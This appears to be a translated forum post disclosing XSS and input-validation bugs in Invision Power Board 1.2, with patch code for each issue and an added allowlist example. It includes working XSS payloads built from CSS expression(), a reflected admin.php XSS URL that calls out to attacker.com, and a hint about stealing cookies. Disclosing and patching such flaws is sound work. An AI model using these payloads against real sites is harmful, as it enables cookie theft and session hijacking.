New bugs in Invision Power Board 1.2 Final
I - Input Validation Flaw in Processing IBF Tags
IBF 1.2 mishandles input tags, which causes posts to be displayed out of
alignment and makes the forum look very ugly :
Code :
[IMG]http://[target]/some.gif[QUOTE]some.gif[/IMG][/QUOTE]
Most forums are affected by this bug. Besides the tag above, you can see that
the [EMAIL] tag is affected as well. Note that the more MODs you hack in, the
more of your tags will show this bug.
Fix :
Open the file : /sources/lib/post_parser.php
Find line 1214; right after the code that checks the image, add this code :
// Check if previous tag has left HTML inside this one
// or if there's another tag in here (just in case) ~ Daniel Boland
if (preg_match( "/[\<\>\[\]]/", $url))
{
$this->error = 'Da Fix roi em a ? :D Hi Hi !';
return $default;
}
II - XSS bug in IBF 1.2 Final :
Besides the XSS bug in the </textarea> tag that Venom posted about in Web
Hacking, IBF also has the following XSS bug, which is more dangerous and also
easier to exploit :D :
[FONT=expression(alert(document.cookie))]Testing :D[/FONT]
The next tag with this bug :
<span style='font-family:expression(alert(document.cookie))'>Hay ko ha ? con
them the nua bi loi day :)</span>
[COLOR=expression(alert(document.cookie))]Hi Hi ?[/COLOR]
And that is not all :D :
<span style='color:expression(alert(document.cookie))'>Hello Neo !</span>
As you can see, the script alert(document.cookie) runs immediately for
everyone who opens the topic to read it; change it a little and you can use
this code to stealthily take cookies !
Note : expression() can also be : expression([SCRIPT]) :D
Fix :
Open the file sources/lib/post_parser.php and find the following code :
while ( preg_match( "#\[font=([^\]]+)\](.*?)\[/font\]#ies", $txt ) )
{
$txt = preg_replace( "#\[font=([^\]]+)\](.*?)\[/font\]#ies" ,
"\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt );
}
while( preg_match( "#\[color=([^\]]+)\](.+?)\[/color\]#ies", $txt ) )
{
$txt = preg_replace( "#\[color=([^\]]+)\](.+?)\[/color\]#ies" ,
"\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
}
Replace it with this :
// Same pattern in both calls : the attribute may not contain ; < > * ( ) ] " or '
while ( preg_match( "#\[font=([^;<>\*\(\)\]\"']*)\](.*?)\[/font\]#ies", $txt ) )
{
$txt = preg_replace( "#\[font=([^;<>\*\(\)\]\"']*)\](.*?)\[/font\]#ies" ,
"\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt );
}
while( preg_match( "#\[color=([a-zA-Z0-9]*)\](.+?)\[/color\]#ies", $txt ) )
{
$txt = preg_replace( "#\[color=([a-zA-Z0-9]*)\](.+?)\[/color\]#ies" ,
"\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
}
Save the file and upload it. Okie :D !
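An added example (not IPB's code and not part of the original post) : the same fix idea written as an allowlist for current PHP, where the /e modifier used in the code above no longer exists. The function names, the allowlist patterns and the sample posts are constructed for illustration.

```php
<?php
// Added example, not IPB code. Function names and sample posts are constructed.

// Render one [font=...] or [color=...] match, or leave it as inert text.
function render_style_tag(array $m): string
{
    $rules = [
        // tag => [CSS property, allowlist for the attribute value]
        'font'  => ['font-family', '/^[a-zA-Z0-9 ,\-]{1,40}\z/'],
        'color' => ['color', '/^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})\z/'],
    ];
    [$prop, $allow] = $rules[strtolower($m[1])];
    $value = trim($m[2]);
    if (!preg_match($allow, $value)) {
        return $m[0];  // rejected: keep the already-escaped BBCode, emit no style
    }
    return "<span style='$prop:$value'>" . $m[3] . "</span>";
}

function parse_post(string $raw): string
{
    // Escape first, so user input can never open a tag or close an attribute.
    $txt = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
    $re  = '#\[(font|color)=([^\]]+)\](.*?)\[/\1\]#is';
    // Repeat for nested tags; stop when a pass changes nothing.
    do {
        $before = $txt;
        // On a PCRE error (null) keep the previous text, which ends the loop.
        $txt = preg_replace_callback($re, 'render_style_tag', $txt) ?? $before;
    } while ($txt !== $before);
    return $txt;
}

// Constructed sample posts: the two payloads from this page plus a benign one.
$samples = [
    '[FONT=expression(alert(document.cookie))]Testing :D[/FONT]',
    '[COLOR=expression(alert(document.cookie))]Hi Hi ?[/COLOR]',
    '[color=red][font=Arial, Helvetica]fine[/font][/color]',
];
foreach ($samples as $post) {
    echo parse_post($post), "\n";
}
```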
III - Invision Power Board Admin.PHP Cross-Site Scripting Vulnerability .
URL :
http://www.example.com/admin.php?adsess='><script>window.open(window.location.search.substring(78));</script><http://www.attacker.com?BoyBear$$$From$$$BinaryVision
Fix :
Open the file admin.php and find the following code :
$IN['AD_SESS'] = $HTTP_POST_VARS['adsess'] ? $HTTP_POST_VARS['adsess'] :
$HTTP_GET_VARS['adsess'];
Then add this right after it :
if (isset($IN['AD_SESS'])) {
$IN['AD_SESS'] = htmlspecialchars($IN['AD_SESS']);
}
In addition, setting up extra passwords to protect the ACP is a decent solution too :) !
IV - Forum Password Protect bug .
IBF protects forums with passwords, but there is a very serious flaw : these
forum passwords are all kept as plain text, unencrypted, in the cookie. So
anyone who grabs the cookie knows the password and can log in to that
protected board.
Fix : There is no fix yet. Protect yourself when you go online : if you use a
public internet shop, remember to delete all cookies before you leave, and
even delete the History too !